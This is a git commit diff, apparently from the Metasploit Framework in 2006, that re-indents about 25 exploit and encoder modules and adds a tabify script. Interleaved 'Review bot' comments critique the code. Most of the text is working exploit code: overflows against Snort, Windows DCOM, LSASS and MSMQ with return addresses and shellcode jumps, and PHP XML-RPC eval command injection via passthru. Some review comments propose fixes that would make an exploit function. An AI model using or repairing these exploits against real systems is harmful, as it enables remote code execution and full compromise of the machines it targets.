Massive update to tab indentation (used ./dev/tabify.rb)

git-svn-id: file:///home/svn/incoming/trunk@3450 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2006-01-27 05:00:35 +00:00
parent d62db8ad91
commit e249d9ebe5
25 changed files with 442 additions and 404 deletions

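--- a/dev/tabify.rb
+++ b/dev/tabify.rb
@@ -0,0 +1,25 @@
+#!/usr/bin/env ruby
+##
+# Convert a ruby source file from space to tab indentation
+# XXX - This program is dumb, it doesn't know about heredocs,
+# multiline strings, or anything remotely fancy!
+##
+fd = STDIN
+input = ARGV.shift
+fd = File.open(input, "r") if input
+tbuff = ''
+etabs = 4
+# Replace the leading spaces with equivalent tab characters
+fd.each_line do |line|
+line.sub!(/^\x20+/) do |m|
+spaces = m.length
+while (spaces % etabs != 0); spaces -= 1; end;
+"\t" * (spaces / etabs)
+end
+tbuff << line
+end
+puts tbuff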
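Review bot: The `while (spaces % etabs != 0); spaces -= 1; end;` loop is dead work, and the spaces it strips are silently lost: integer division already floors, so `"\t" * (m.length / etabs)` produces the same string, and any one to three leftover spaces of continuation-line alignment vanish from the output. If that alignment is worth keeping, emit it after the tabs: `"\t" * (m.length / etabs) + (" " * (m.length % etabs))`. `File.open(input, "r")` is also never closed; `File.foreach(input)` or the block form of `File.open` would release the descriptor once the lines are read.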


@ -16,7 +16,7 @@ class AlphaMixed < Msf::Encoder::Alphanum
'Description' => %q{
Encodes payloads as alphanumeric mixedcase text. This encoder uses
SkyLined's Alpha2 encoding suite.
},
},
'Author' => [ 'pusscat', 'skylined' ],
'Arch' => ARCH_X86,
'License' => MSF_LICENSE,


@ -16,7 +16,7 @@ class AlphaUpper < Msf::Encoder::Alphanum
'Description' => %q{
Encodes payloads as alphanumeric uppercase text. This encoder uses
SkyLined's Alpha2 encoding suite.
},
},
'Author' => [ 'pusscat' 'skylined' ],
'Arch' => ARCH_X86,
'License' => MSF_LICENSE,
@ -34,7 +34,7 @@ class AlphaUpper < Msf::Encoder::Alphanum
def decoder_stub(state)
reg = datastore['BufferRegister'] || 'EAX'
offset = datastore['BufferOffset'].to_i || 0
Rex::Encoder::Alpha2::AlphaUpper::gen_decoder(reg, offset)
end
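Review bot: The context line `'Author' => [ 'pusscat' 'skylined' ],` is missing a comma, so Ruby concatenates the adjacent literals and this encoder advertises a single author `'pusscatskylined'`; the sibling encoders in this commit write `[ 'pusscat', 'skylined' ]`. The hunk only re-indents, so the defect predates it, but the fix is the one-character change `'Author' => [ 'pusscat', 'skylined' ],`. In `decoder_stub`, `datastore['BufferOffset'].to_i || 0` is misleading as well: `to_i` never yields nil (`nil.to_i` is 0), so the `|| 0` is dead and `datastore['BufferOffset'].to_i` alone reads the same.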


@ -16,7 +16,7 @@ class UnicodeMixed < Msf::Encoder::Alphanum
'Description' => %q{
Encodes payloads as unicode-safe mixedcase text. This encoder uses
SkyLined's Alpha2 encoding suite.
},
},
'Author' => [ 'pusscat', 'skylined' ],
'Arch' => ARCH_X86,
'License' => MSF_LICENSE,


@ -16,7 +16,7 @@ class UnicodeUpper < Msf::Encoder::Alphanum
'Description' => %q{
Encodes payloas as unicode-safe uppercase text. This encoder uses
SkyLined's Alpha2 encoding suite.
},
},
'Author' => [ 'pusscat', 'skylined' ],
'Arch' => ARCH_X86,
'License' => MSF_LICENSE,


@ -8,83 +8,90 @@ class Exploits::Linux::Ids::Snortbopre < Msf::Exploit::Remote
def initialize(info = {})
super(update_info(info,
'Name' => 'Snort Back Orifice Pre-Preprocessor Remote Exploit',
'Description' => %q{
This module exploits a stack overflow in the Back Orifice pre-processor module
included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could
be used to completely compromise a Snort sensor, and would typically gain an attacker
full root or administrative privileges.
},
'Author' => 'KaiJern Lau <xwings [at] mysec.org>',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['URL','http://xforce.iss.net/xforce/alerts/id/207'] ,
],
'Payload' =>
{
'Space' => 1073, #ret : 1069
'BadChars' => "\x00",
},
'Targets' =>
[
# Target 0: Debian 3.1 Sarge
[
'Debian 3.1 Sarge',
{
'Platform' => 'linux',
'Ret' => 0xbffff350
}
],
],
'DefaultTarget' => 0))
'Name' => 'Snort Back Orifice Pre-Preprocessor Remote Exploit',
'Description' => %q{
This module exploits a stack overflow in the Back Orifice pre-processor module
included with Snort versions 2.4.0, 2.4.1, 2.4.2, and 2.4.3. This vulnerability could
be used to completely compromise a Snort sensor, and would typically gain an attacker
full root or administrative privileges.
},
'Author' => 'KaiJern Lau <xwings [at] mysec.org>',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['URL','http://xforce.iss.net/xforce/alerts/id/207'] ,
],
'Payload' =>
{
'Space' => 1073, #ret : 1069
'BadChars' => "\x00",
},
'Targets' =>
[
# Target 0: Debian 3.1 Sarge
[
'Debian 3.1 Sarge',
{
'Platform' => 'linux',
'Ret' => 0xbffff350
}
],
],
'DefaultTarget' => 0))
# Configure the default port to be 9080
register_options(
[
Opt::RPORT(9080),
], self.class)
# Configure the default port to be 9080
register_options(
[
Opt::RPORT(9080),
], self.class)
end
def msrand(seed)
@holdrand = 31337
end
def msrand(seed)
@holdrand = 31337
end
def mrand()
return (((@holdrand=@holdrand*(214013 & 0xffffffff)+(2531011 & 0xffffffff))>>16)&0x7fff)
end
def mrand()
return (((@holdrand=@holdrand*(214013 & 0xffffffff)+(2531011 & 0xffffffff))>>16)&0x7fff)
end
def bocrypt(takepayload)
def bocrypt(takepayload)
@arrpayload = (takepayload.split(//))
@arrpayload = (takepayload.split(//))
encpayload = ""
@holdrand=0
msrand(0)
encpayload = ""
@holdrand=0
msrand(0)
@arrpayload.each do |c|
encpayload +=((c.unpack("C*").map{ |v| (v^(mrand()%256)) }.join)).to_i.chr
end
@arrpayload.each do |c|
encpayload +=((c.unpack("C*").map{ |v| (v^(mrand()%256)) }.join)).to_i.chr
end
return encpayload
end
return encpayload
end
def exploit
connect_udp
boheader = "*!*QWTY?" +
[1096].pack("V") + # Length ,thanx Russell Sanford
"\xed\xac\xef\x0d"+ # ID
"\x01" # PING
filler = make_nops(1069 -(boheader.length + payload.encode.length))
def exploit
connect_udp
boheader =
"*!*QWTY?" +
[1096].pack("V") + # Length ,thanx Russell Sanford
"\xed\xac\xef\x0d"+ # ID
"\x01" # PING
filler =
make_nops(1069 -(boheader.length + payload.encode.length))
udp_sock.write(bocrypt(boheader+payload.encode+filler+[target.ret].pack('V')))
handler
disconnect_udp
end
udp_sock.write(
bocrypt(boheader+payload.encode+filler+[target.ret].pack('V'))
)
handler
disconnect_udp
end
end
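Review bot: In `mrand`, the two `& 0xffffffff` masks sit on the constants 214013 and 2531011, where they are no-ops, instead of on the updated state, so `@holdrand` grows as an unbounded Bignum on every call; the bits extracted by `>> 16) & 0x7fff` come out the same, but the intent is clearer and the state stays 32-bit with `@holdrand = (@holdrand * 214013 + 2531011) & 0xffffffff` followed by `(@holdrand >> 16) & 0x7fff`. `msrand(seed)` ignores `seed` and always stores 31337, and `bocrypt` assigns `@holdrand = 0` immediately before calling `msrand(0)`, so that assignment is dead. Separately, the payload declares `'Space' => 1073` while `filler` is sized as `1069 - (boheader.length + payload.encode.length)` with a 17-byte header, so a payload near the declared maximum yields a negative nop count; presumably the space should be derived from the same 1069 budget, to be confirmed against how `make_nops` treats a negative length.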


@ -10,12 +10,12 @@ class Exploits::Osx::Afp::AFPLoginExt < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'AppleFileServer LoginExt PathName Overflow',
'Description' => %q{
This module exploits a stack overflow in the AppleFileServer service
on MacOS X. This vulnerability was originally reported by Atstake and
was actually one of the few useful advisories ever published by that
company. You only have one chance to exploit this bug.
This particular exploit uses a stack-based return address that will
only work under optimal conditions.
This module exploits a stack overflow in the AppleFileServer service
on MacOS X. This vulnerability was originally reported by Atstake and
was actually one of the few useful advisories ever published by that
company. You only have one chance to exploit this bug.
This particular exploit uses a stack-based return address that will
only work under optimal conditions.
},
'Author' => 'hdm',
'License' => MSF_LICENSE,


@ -66,7 +66,7 @@ use Pex::XDR;
my $advanced = { };
my $info =
{
{
'Name' => 'Solaris KCMS Arbitary File Read',
'Version' => '$Revision$',
'Authors' => [ 'vlad902 <vlad902 [at] gmail.com>', ],
@ -98,7 +98,7 @@ my $info =
'Keys' => ['kcms'],
'DisclosureDate' => 'Jan 22 2003',
};
};
sub new {
my $class = shift;


@ -73,7 +73,7 @@ use Pex::XDR;
my $advanced = {};
my $info =
{
{
'Name' => 'Solaris sadmind Command Execution',
'Version' => '$Revision$',
'Authors' =>
@ -102,10 +102,10 @@ my $info =
},
'Description' => Pex::Text::Freeform(qq{
This exploit targets a weakness in the default security
settings of the sadmind RPC application. This server is
installed and enabled by default on most versions of the
Solaris operating system.
This exploit targets a weakness in the default security
settings of the sadmind RPC application. This server is
installed and enabled by default on most versions of the
Solaris operating system.
}),
'Refs' =>
@ -120,7 +120,7 @@ my $info =
'Keys' => ['sadmind'],
'DisclosureDate' => 'Sep 13 2003',
};
};
sub new {
my $class = shift;


@ -72,7 +72,7 @@ use Pex::XDR;
my $advanced = { };
my $info =
{
{
'Name' => 'Solaris snmpXdmid AddComponent Overflow',
'Version' => '$Revision$',
'Authors' => [ 'vlad902 <vlad902 [at] gmail.com>', ],
@ -114,7 +114,7 @@ my $info =
'Keys' => ['snmpxdmid'],
'DisclosureDate' => 'Mar 15 2001',
};
};
sub new {
my $class = shift;


@ -68,7 +68,7 @@ use Pex::Text;
my $advanced = { };
my $info =
{
{
'Name' => 'Solaris /bin/login TTYPROMPT Overflow',
'Version' => '$Revision$',
'Authors' =>
@ -94,7 +94,7 @@ my $info =
},
'Description' => Pex::Text::Freeform(qq{
This is a msf port of optyx's /bin/login exploit.
This is a msf port of optyx's /bin/login exploit.
}),
'Refs' =>
@ -110,7 +110,7 @@ my $info =
],
'Keys' => ['broken'],
};
};
sub new {
my $class = shift;


@ -34,7 +34,7 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
},
'PayloadCompat' =>
{
"PayloadType" => "cmd cmd_interact",
"PayloadType" => "cmd_interact",
},
'Targets' =>
[
@ -77,7 +77,13 @@ class Exploits::Solaris::Telnet::TTYPrompt_Auth_Bypass < Msf::Exploit::Remote
print_status("Sending username with 65 environment variables...")
sock.put(datastore['USER'] + (" M" * 65) + "\n")
sock.put(payload.encoded)
sock.put("\n\n\n")
sleep(0.25)
sock.get_once
sock.put(payload.encoded + "\n")
sleep(0.25)
handler
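Review bot: The value returned by the new `sock.get_once` call is discarded, so nothing confirms what the server sent back before `payload.encoded + "\n"` is written; a non-vulnerable or slow target receives the payload regardless, with the fixed `sleep(0.25)` calls as the only pacing. Capturing the read, e.g. `res = sock.get_once`, and returning with a status message when it is nil would make that failure visible instead of silent. The enclosing `exploit` method begins before this hunk.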


@ -20,28 +20,28 @@ class Exploits::Unix::Http::PhpXmlrpcEval < Msf::Exploit::Remote
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' => [
[ 'OSVDB', '14047'],
[ 'CVE', '2005-0511'],
[ 'MIL', '81'],
[ 'OSVDB', '14047'],
[ 'CVE', '2005-0511'],
[ 'MIL', '81'],
],
'Privileged' => false,
'Platform' => ['unix', 'solaris'],
'Platform' => ['unix', 'solaris'],
'Payload' => {
'Space' => 512,
'DisableNops' => true,
'Keys' => ['cmd', 'cmd_bash'],
'Space' => 512,
'DisableNops' => true,
'Keys' => ['cmd', 'cmd_bash'],
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0,
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 25 2005'
))
))
register_options(
[
OptString.new('PATH', [ true, "Path to misc.php", '/forum/misc.php']),
], self.class
)
register_options(
[
OptString.new('PATH', [ true, "Path to misc.php", '/forum/misc.php']),
], self.class
)
deregister_options(
'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
@ -49,54 +49,54 @@ class Exploits::Unix::Http::PhpXmlrpcEval < Msf::Exploit::Remote
end
def go(command)
wrapper = Rex::Text.rand_text_alphanumeric(rand(128)+32)
wrapper = Rex::Text.rand_text_alphanumeric(rand(128)+32)
command = "echo #{wrapper};#{command};echo #{wrapper};"
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
uri = datastore['PATH'] + "?do=page&template={${passthru(#{encoded})}}";
res = request({
'uri' => datastore['PATH'],
'method' => 'GET',
})
res = request({
'uri' => datastore['PATH'],
'method' => 'GET',
})
if (res and res.body)
b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body)
if b
return b.captures[0]
elsif datastore['HTTP::chunked'] == true
b = /chunked Transfer-Encoding forbidden/.match(res.body)
if b
raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
end
end
end
if (res and res.body)
b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body)
if b
return b.captures[0]
elsif datastore['HTTP::chunked'] == true
b = /chunked Transfer-Encoding forbidden/.match(res.body)
if b
raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
end
end
end
return nil
return nil
end
def check
response = go("echo ownable")
if (!response.nil? and response =~ /ownable/sm)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def check
response = go("echo ownable")
if (!response.nil? and response =~ /ownable/sm)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
response = go(payload.encoded)
if response == nil
print_status('exploit failed')
def exploit
response = go(payload.encoded)
if response == nil
print_status('exploit failed')
else
if response.length == 0
print_status('exploit successful')
else
print_status("Command returned #{response}")
end
handler
end
end
if response.length == 0
print_status('exploit successful')
else
print_status("Command returned #{response}")
end
handler
end
end
end
end
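Review bot: In `go`, `uri` is assembled with the `?do=page&template=...` query that carries `encoded`, but the request a few lines later is sent with `'uri' => datastore['PATH']`, so `uri` is never used and the command never leaves the module; unless `request` picks it up from elsewhere, the call should read `'uri' => uri`. The hunk only re-indents the method, so the defect predates this commit. The sibling xmlrpc.php module in the same commit does send its built `xml` body, which makes this look like a leftover rather than intent.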


@ -10,39 +10,39 @@ class Exploits::Unix::Http::PhpXmlrpcEval < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'PHP XML-RPC Arbitrary Code Execution',
'Description' => %q{
This module exploits an arbitrary code execution flaw
discovered in many implementations of the PHP XML-RPC module.
This flaw is exploitable through a number of PHP web
applications, including but not limited to Drupal, Wordpress,
Postnuke, and TikiWiki.
This module exploits an arbitrary code execution flaw
discovered in many implementations of the PHP XML-RPC module.
This flaw is exploitable through a number of PHP web
applications, including but not limited to Drupal, Wordpress,
Postnuke, and TikiWiki.
},
'Author' => [ 'hdm', 'cazz' ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
['BID', '14088'],
['CVE', '2005-1921'],
['MIL', '49'],
['BID', '14088'],
['CVE', '2005-1921'],
['MIL', '49'],
],
'Privileged' => false,
'Platform' => ['unix', 'solaris'],
'Platform' => ['unix', 'solaris'],
'Payload' => {
'Space' => 512,
'DisableNops' => true,
'Keys' => ['cmd', 'cmd_bash'],
'Space' => 512,
'DisableNops' => true,
'Keys' => ['cmd', 'cmd_bash'],
},
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0,
'Targets' => [ ['Automatic', { }], ],
'DefaultTarget' => 0,
'DisclosureDate' => 'Jun 29 2005'
))
))
register_options(
[
OptString.new('PATH', [ true, "Path to xmlrpc.php", '/xmlrpc.php']),
], self.class
)
register_options(
[
OptString.new('PATH', [ true, "Path to xmlrpc.php", '/xmlrpc.php']),
], self.class
)
deregister_options(
'HTTP::junk_params', # not your typical POST, so don't inject params.
@ -52,64 +52,64 @@ class Exploits::Unix::Http::PhpXmlrpcEval < Msf::Exploit::Remote
def go(command)
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
wrapper = Rex::Text.rand_text_alphanumeric(rand(128)+32)
cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;"
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
wrapper = Rex::Text.rand_text_alphanumeric(rand(128)+32)
cmd = "echo('#{wrapper}'); passthru(#{ encoded }); echo('#{wrapper}');;"
xml =
'<?xml version="1.0"?>' +
"<methodCall>" +
"<methodName>"+ Rex::Text.rand_text_alphanumeric(rand(128)+32) + "</methodName>" +
"<params><param>" +
"<name>" + Rex::Text.rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" +
"<value>" + Rex::Text.rand_text_alphanumeric(rand(128)+32) + "</value>" +
"</param></params>" +
"</methodCall>";
xml =
'<?xml version="1.0"?>' +
"<methodCall>" +
"<methodName>"+ Rex::Text.rand_text_alphanumeric(rand(128)+32) + "</methodName>" +
"<params><param>" +
"<name>" + Rex::Text.rand_text_alphanumeric(rand(128)+32) + "');#{cmd}//</name>" +
"<value>" + Rex::Text.rand_text_alphanumeric(rand(128)+32) + "</value>" +
"</param></params>" +
"</methodCall>";
res = request({
'uri' => datastore['PATH'],
'method' => 'POST',
'Content-Type' => 'application/xml',
'data' => xml,
})
res = request({
'uri' => datastore['PATH'],
'method' => 'POST',
'Content-Type' => 'application/xml',
'data' => xml,
})
if (res and res.body)
b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)
if b
return b.captures[0]
elsif datastore['HTTP::chunked'] == true
b = /chunked Transfer-Encoding forbidden/.match(res.body)
if b
raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
end
end
end
if (res and res.body)
b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)
if b
return b.captures[0]
elsif datastore['HTTP::chunked'] == true
b = /chunked Transfer-Encoding forbidden/.match(res.body)
if b
raise RuntimeError, 'Target PHP installation does not support chunked encoding. Support for chunked encoded requests was added to PHP on 12/15/2005, try disabling HTTP::chunked and trying again.'
end
end
end
return nil
return nil
end
def check
response = go("echo ownable")
if (!response.nil? and response =~ /ownable/sm)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def check
response = go("echo ownable")
if (!response.nil? and response =~ /ownable/sm)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
response = go(payload.encoded)
if response == nil
print_status('exploit failed')
def exploit
response = go(payload.encoded)
if response == nil
print_status('exploit failed')
else
if response.length == 0
print_status('exploit successful')
else
print_status("Command returned #{response}")
end
handler
end
end
if response.length == 0
print_status('exploit successful')
else
print_status("Command returned #{response}")
end
handler
end
end
end
end


@ -113,17 +113,19 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
nt4sp5jmpback = "\xe9" + [ ((5 + 4 + payload.encoded.length) * -1) ].pack('V')
nt4sp3jmpback = "\xe9" + [ ((12 + 5 + 5 + payload.encoded.length) * -1) ].pack('V')
ntshiz = nt4sp3jmp +
[ target['Rets'][6] ].pack('V') +
[ target['Rets'][5] ].pack('V') +
nt4sp5jmpback +
nt4sp3jmpback
ntshiz =
nt4sp3jmp +
[ target['Rets'][6] ].pack('V') +
[ target['Rets'][5] ].pack('V') +
nt4sp5jmpback +
nt4sp3jmpback
# Pad to the magic value of 118 bytes
ntshiz += Rex::Text.rand_text(118 - ntshiz.length, payload_badchars)
# Create the evil UNC path used in the overflow
uncpath = "\x5c\x00\x5c\x00" +
uncpath =
"\x5c\x00\x5c\x00" +
("\x90" * 32) +
"\xeb\x10\xeb\x19" + # When attacking NT 4.0, jump over 2000/XP return
[ target['Rets'][2] ].pack('V') + # Return address for 2000 (ebx)
@ -142,41 +144,41 @@ class Exploits::Windows::Dcerpc::MS03_026_DCOM < Msf::Exploit::Remote
# This is the rpc cruft needed to trigger the vuln API
stubdata =
NDR.short(5) +
NDR.short(1) +
NDR.long(0) +
NDR.long(0) +
Rex::Text.rand_text(16) +
NDR.long(0) +
NDR.long(0) +
NDR.long(0) +
NDR.long(0) +
NDR.long(0) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.short(5) +
NDR.short(1) +
NDR.long(0) +
NDR.long(0) +
NDR.UnicodeConformantVaryingStringPreBuilt(uncpath) +
Rex::Text.rand_text(16) +
NDR.long(0) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(0) +
NDR.long(0) +
NDR.long(0) +
NDR.long(0) +
NDR.long(0) +
NDR.long(1) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(1) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.UnicodeConformantVaryingStringPreBuilt(uncpath) +
NDR.long(1) +
NDR.long(1) +
NDR.long(rand(0xFFFFFFFF))
NDR.long(0) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(1) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(1) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(rand(0xFFFFFFFF)) +
NDR.long(1) +
NDR.long(1) +
NDR.long(rand(0xFFFFFFFF))
print_status('sending exploit ...')
begin
dcerpc_call(0, stubdata)


@ -62,11 +62,11 @@ class Exploits::Windows::Dcerpc::MS05_017_MSMQ < Msf::Exploit::Remote
def exploit
connect
print_status("Trying target #{target.name}...")
handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
handle = dcerpc_handle('fdb3a030-065f-11d1-bb9b-00a024ea5525', '1.0', 'ncacn_ip_tcp', [datastore['RPORT']])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
# MSMQ supports three forms of queue names, the two we can use are
@ -97,20 +97,21 @@ class Exploits::Windows::Dcerpc::MS05_017_MSMQ < Msf::Exploit::Remote
# Get the unicode length of this string
queue_plen = queue_path.length / 2
stubdata = NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(3) +
NDR.long(3) +
NDR.long(2) +
NDR.UnicodeConformantVaryingStringPreBuilt(queue_path)
stubdata =
NDR.long(1) +
NDR.long(1) +
NDR.long(1) +
NDR.long(3) +
NDR.long(3) +
NDR.long(2) +
NDR.UnicodeConformantVaryingStringPreBuilt(queue_path)
print_status('sending exploit ...')
response = dcerpc.call(0, stubdata)
print_status('sending exploit ...')
response = dcerpc.call(0, stubdata)
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
case dcerpc.last_response.stub_data
if (dcerpc.last_response != nil and dcerpc.last_response.stub_data != nil)
case dcerpc.last_response.stub_data
when "\x20\x00\x0e\xc0"
print_status("The server rejected our request, the HNAME parameter could be incorrect")
when "\x1e\x00\x0e\xc0"
@ -118,8 +119,8 @@ class Exploits::Windows::Dcerpc::MS05_017_MSMQ < Msf::Exploit::Remote
else
print_status("An unknown response was received from the server:")
print_status(">> " + dcerpc.last_response.stub_data.unpack("H*")[0])
end
end
end
end
handler
disconnect


@ -83,7 +83,7 @@ use IO::Select;
my $advanced = { };
my $info =
{
{
'Name' => 'CA License Client GETCONFIG Overflow',
'Version' => '$Revision$',
'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
@ -105,17 +105,17 @@ my $info =
},
'Description' => Pex::Text::Freeform(qq{
This module exploits an vulnerability in the CA License Client
service. This exploit will only work if your IP address will
resolve to the target system. This can be accomplished on a local
network by running the 'nmbd' service that comes with Samba. If
you are running this exploit from Windows and do not filter udp
port 137, this should not be a problem (if the target is on the same
network segment). Due to the bugginess of the software, you are
only allowed one connection to the agent port before it starts
ignoring you. If it wasn't for this issue, it would be possible to
repeatedly exploit this bug.
This module exploits an vulnerability in the CA License Client
service. This exploit will only work if your IP address will
resolve to the target system. This can be accomplished on a local
network by running the 'nmbd' service that comes with Samba. If
you are running this exploit from Windows and do not filter udp
port 137, this should not be a problem (if the target is on the same
network segment). Due to the bugginess of the software, you are
only allowed one connection to the agent port before it starts
ignoring you. If it wasn't for this issue, it would be possible to
repeatedly exploit this bug.
}),
'Refs' =>
@ -143,7 +143,7 @@ my $info =
'Keys' => ['calicense'],
'DisclosureDate' => 'Mar 02 2005',
};
};
sub new {
my $class = shift;


@ -74,7 +74,7 @@ use Pex::Text;
my $advanced = { };
my $info =
{
{
'Name' => 'CA License Server GETCONFIG Overflow',
'Version' => '$Revision$',
'Authors' => [ 'Thor Doomen <syscall [at] hushmail.com>' ],
@ -96,9 +96,9 @@ my $info =
},
'Description' => Pex::Text::Freeform(qq{
This module exploits an vulnerability in the CA License Server
network service. This is a simple stack overflow and just one of
many serious problems with this software.
This module exploits an vulnerability in the CA License Server
network service. This is a simple stack overflow and just one of
many serious problems with this software.
}),
'Refs' =>
@ -126,7 +126,7 @@ my $info =
'Keys' => ['calicense'],
'DisclosureDate' => 'Mar 02 2005',
};
};
sub new {
my $class = shift;


@ -18,7 +18,7 @@ class Exploits::Windows::Proxy::Bluecoat_WinProxy_Host < Msf::Exploit::Remote
'Author' => 'MC',
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
'References' =>
[
['CVE', '2005-4085'],
],
@ -46,9 +46,9 @@ class Exploits::Windows::Proxy::Bluecoat_WinProxy_Host < Msf::Exploit::Remote
'DefaultTarget' => 0))
register_options(
[
Opt::RPORT(80)
], self)
[
Opt::RPORT(80)
], self)
end
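Review bot: `register_options([ Opt::RPORT(80) ], self)` passes `self` as the owner, whereas every other module touched by this commit passes `self.class` (the snortbopre, xmlrpc and NetDDE modules, for instance); unless the framework accepts both, the closing line should be `], self.class)`. The hunk itself only re-indents the call, so this is a pre-existing inconsistency.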


@ -40,13 +40,13 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
'BadChars' => "\x00\x0a\x0d\x5c\x5f\x2f\x2e",
'Prepend' => "\x81\xc4\xff\xef\xff\xff\x44",
},
'Platform' => 'win',
'Targets' =>
[
# Automatic
[
'Automatic Targetting',
{
'Platform' => 'win',
'Rets' => [ ],
},
],
@ -54,7 +54,6 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
[
'Windows 2000 English',
{
'Platform' => 'win',
'Rets' => [ 0x773242e0 ],
},
],
@ -62,7 +61,6 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
[
'Windows XP English',
{
'Platform' => 'win',
'Rets' => [ 0x7449bf1a ],
},
],
@ -72,17 +70,17 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
def exploit
connect()
connect()
handle = dcerpc_handle('3919286a-b10c-11d0-9ba8-00c04fd92ef5', '0.0', 'ncacn_np', ['\lsarpc'])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
handle = dcerpc_handle('3919286a-b10c-11d0-9ba8-00c04fd92ef5', '0.0', 'ncacn_np', ['\lsarpc'])
print_status("Binding to #{handle} ...")
dcerpc_bind(handle)
print_status("Bound to #{handle} ...")
print_status('Getting OS ...')
print_status('Getting OS ...')
# Check the remote OS name and version
os = smb_peer_lm
string = ''
string = ''
case os
# Windows 2000 requires that the string be unicode formatted
# and give us a nice set of registers which point back to
@ -93,7 +91,7 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
str = Rex::Text.rand_text_alphanumeric(3500)
str[2020, 4] = [targets[1]['Rets'][0]].pack('V')
str[2104, payload.encoded.length ] = payload.encoded
string = NDR.UnicodeConformantVaryingString(str)
string = NDR.UnicodeConformantVaryingString(str)
# Windows XP is a bit different, we need to use an ascii
# buffer and a jmp esp. The esp register points to an
# eight byte segment at the end of our buffer in memory,
@ -105,34 +103,34 @@ class Exploits::Windows::Smb::MS04_011_LSASS < Msf::Exploit::Remote
str[0, payload.encoded.length ] = payload.encoded
str[1964, 4] = [targets[2]['Rets'][0]].pack('V')
str[1980, 5] = "\xe9\x3f\xf8\xff\xff" # jmp back to payload
string = str
string = str
when
print_status("No target is available for #{ os }")
return
end
stub = string +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
NDR.UnicodeConformantVaryingString('') +
NDR.UnicodeConformantVaryingString('') +
NDR.UnicodeConformantVaryingString('') +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
Rex::Text.rand_text(528) +
Rex::Text.rand_text(528) +
NDR.long(rand(0xFFFFFF))
stub = string +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
NDR.UnicodeConformantVaryingString('') +
NDR.UnicodeConformantVaryingString('') +
NDR.UnicodeConformantVaryingString('') +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
NDR.long(rand(0xFFFFFF)) +
NDR.UnicodeConformantVaryingString('') +
NDR.long(rand(0xFFFFFF)) +
